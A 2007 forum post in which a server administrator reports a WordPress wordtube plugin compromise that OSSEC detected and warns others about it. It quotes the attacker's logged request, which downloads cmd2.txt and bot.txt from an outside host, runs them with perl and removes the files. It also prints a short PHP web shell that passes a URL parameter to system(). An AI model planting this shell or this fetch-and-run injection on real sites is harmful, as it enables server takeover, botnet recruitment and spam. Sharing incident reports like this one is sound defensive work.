Using Wordpress and its Plugin's

Discussion in 'Server Operation' started by brainz, May 18, 2007.

  1. brainz

    brainz Member

    Risks of using Wordpress and its Plugin's

    Hi all,

    i just wanted to show you all this because i feel i must so the word can be spread and people are aware of what can happen... I'm sorry but i didn't know where to place this post but falko or till you may move this post to the appropriate forum if you like... or remove it completely if you like as well...

    firstly and lucky i followed falkos howto on how to install OSSEC HIDS and am so glad that i did i received emails from the server one day they looked like this...

    When you look at it, it simply becomes obvious for those that cant see it what it is doing is injecting script into a plugin directory used in wordpress... then GETing some bad scripts and creating a directory executing those scripts and then deleting the folder the scripts are in.

    this is what it looks like...

    /wp-login.php?redirect_to= wp-content plugins wordtube wordtube-button.php wpPATH http www.freewebtown.com mssn cmd2.txt cmd cd tmp GET http www.freewebtown.com mssn bot.txt bot.txt perl bot.txt rm -rf bot HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"

    What i got from this was this...

    redirect from /wp-login.php?redirect_to= wp-content/plugins/wordtube/wordtube-button.php
    in the wpPATH get www.freewebtown.com/mssn/cmd2.txt
    command cd tmp and
    GET http www.freewebtown.com/mssn/bot.txt
    bot.txt perl
    bot.txt rm -rf bot
    HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"

    So i think going to the plug in folder wordtube and getting cmd2.txt and cmd.txt and bot.txt and creating a directory called bot then executing the files using perl then removing the directory bot and all its content.

    now for the content of these files...

    cmd.txt or cmd2.txt content is pritty small...


    <?php
    /*/
    /*
    /* CMD by : PKS <[email protected]>
    /* Website :No Avaliable
    /*/

    Echo "<textarea cols=\"80\" rows=\"20\" readonly>";
    system($_GET['cmd']);
    die();
    ?>

    http://www.freewebtown.com/pkspks/cmd.txt

    This script seems to be creating a textarea thats readonly and then prehaps requesting a system command prompt and then dieing...
    i'm not that sure of this part.

    now the bot.txt this one is longer i might add it to a zip file, but i'm sure that anyone that looks at this script will know that the script is basically doing...

    eg. makes your server join a botnet and uses sendmail to send spam emails opens a and creates its own httpd and sshd and removes logs and tracks and creates user groups and accounts as well you get the picture...

    also another script that is injected is a phpshell script...

    now i'm wondering what to do.. fully reinstall the server from scratch or try and clean the server out.... somehow...

    well this is meant to be just a informational thread just make people aware of the threats out there...

    well any type of advise or help would be appreciated..

    Just a quick one as well i would be careful when using any plugin's and make use there from a well known and established source well sometimes that wont help either...

    regards
    brainz
     

    Attached Files:

    Last edited: May 20, 2007

Share This Page